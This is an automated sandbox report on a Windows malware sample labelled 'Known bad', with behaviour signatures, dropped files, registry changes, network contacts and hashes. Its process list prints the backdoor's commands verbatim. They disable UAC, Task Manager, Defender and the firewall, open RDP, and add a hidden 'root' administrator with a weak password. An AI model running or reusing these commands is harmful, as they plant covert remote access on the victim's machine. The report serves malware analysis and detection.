Analysis Overview
SHA256
c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6
Threat Level: Known bad
The file c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6 was found to be: Known bad.
Malicious Activity Summary
UAC bypass
RMS
ACProtect 1.3x - 1.4x DLL software
Disables Task Manager via registry modification
UPX packed file
Executes dropped EXE
Sets file to hidden
Sets DLL path for service in the registry
Modifies Windows Firewall
Checks computer location settings
Loads dropped DLL
Modifies WinLogon
Checks installed software on the system
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: SetClipboardViewer
Suspicious behavior: LoadsDriver
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs net.exe
Delays execution with timeout.exe
Views/modifies file attributes
Enumerates processes with tasklist
Runs .reg file with regedit
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-08 16:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-08 16:54
Reported
2022-02-08 18:41
Platform
win7-en-20211208
Max time kernel
160s
Max time network
186s
Command Line
Signatures
RMS
UAC bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Checks installed software on the system
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe
"C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
"C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat" "
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\find.exe
find "rutserv.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im systemp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im igfxtraise.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RMS.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
RDP.exe
C:\ProgramData\RDP\run.exe
"C:\ProgramData\RDP\run.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\RDP\run.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
uac.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C6E.tmp\9C9E.bat C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe"
C:\Windows\system32\cmd.exe
Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Windows\system32\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
task.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A535.tmp\A536.bat C:\Users\Admin\AppData\Local\Temp\RMS\task.exe"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
defender.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A5E0.tmp\A5E1.bat C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
firewall.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD9D.tmp\AD9E.bat C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe"
C:\Windows\system32\net.exe
net stop "MpsSvc"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MpsSvc"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "FirewallControlPanel.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /silentinstall
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\net.exe
net user root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root /add
C:\Windows\SysWOW64\net.exe
net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\net.exe
net user root 12345
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root 12345
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -i -o
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp\RMS" /S /D
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp" /S /D
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat" "
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -w
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1668-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat
| MD5 | 29e13072fa219a53afa88d84ffc17903 |
| SHA1 | e0d2a5ea26982260471588775dceb3a60b3a2d01 |
| SHA256 | d9ca40913b5a976f4b7e07ed83adc217c94730f60ab7e9307d8a5ba4d287387b |
| SHA512 | 314449c87df12cfc4d770ff72f5816eadc5336503104480ec0482aa1918be1730a3d3a580dd1c17669c55d473de4e5df6d035ef8e32e0f8326eac8bf58f0b120 |
\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
